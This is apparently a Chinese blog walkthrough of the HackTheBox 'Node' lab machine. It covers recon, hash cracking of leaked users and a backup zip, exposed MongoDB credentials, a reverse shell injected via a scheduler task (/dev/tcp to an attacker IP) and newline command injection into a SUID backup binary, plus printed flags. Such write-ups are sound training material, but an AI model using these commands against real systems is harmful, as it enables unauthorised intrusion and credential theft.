[Meachines] [Medium] node E-NodeJS-API泄露+备份文件泄露+TRP00F自动权限提升+app.js与MongoDB命令注入+backup权限提升

信息收集

IP AddressOpening Ports
10.10.10.58TCP:22,3000

$ nmap -p- 10.10.10.58 --min-rate 1000 -sC -sV -Pn

PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
|_http-title: MyPlace
| hadoop-tasktracker-info: 
|_  Logs: /login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP & Backup zip

http://10.10.10.58:3000/

image.png

http://10.10.10.58:3000/api/users/

image-1.png

https://crackstation.net/

image-2.png

http://10.10.10.58:3000/login

username:myP14ceAdm1nAcc0uNT,tom,mark,rastating
password:manchester,spongebob,snowflake,NULL

image-3.png

$ binwalk myplace.backup

image-4.png

$ cat myplace.backup|base64 -d >myplace.backup.decode

image-5.png

image-6.png

$ zip2john myplace.backup.decode -o myplace.backup.decode.john

$ john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.decode.john

password:magicword

image-7.png

$ unzip myplace.backup.decode

$ cat var/www/myplace/app.js

mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace

image-8.png

TRP00F Skip Root

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10033 --rhost 10.10.16.24 --rport 10034 --http 9999 --password '5AYRft73VtFpc84k'

image-10.png

mark to tom & mongoDB 任务注入

$ ssh mark@10.10.10.58

image-9.png

$ cat /var/www/myplace/app.js

image-11.png

该脚本将连接到Mongo数据库,然后每30秒运行一系列命令。它将从任务集合中获取项。对于每个文档,它会将doc.cmd传递给exec运行它,然后删除该文档。

$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
> show collections
> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'"})
> db.tasks.find()

image-12.png

User.txt

b0ca19843af3d049a782f7f16b0cf144

权限提升 & 命令注入

image-13.png

$ file /usr/local/bin/backup

image-14.png

image-15.png

在第一个参数中存在一个-q选项

image-16.png

image-17.png

image-18.png

$ /usr/local/bin/backup -q "" '
/bin/bash'

image-20.png

Root.txt

2278ab816e1cd3204d1b331144bf9704

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值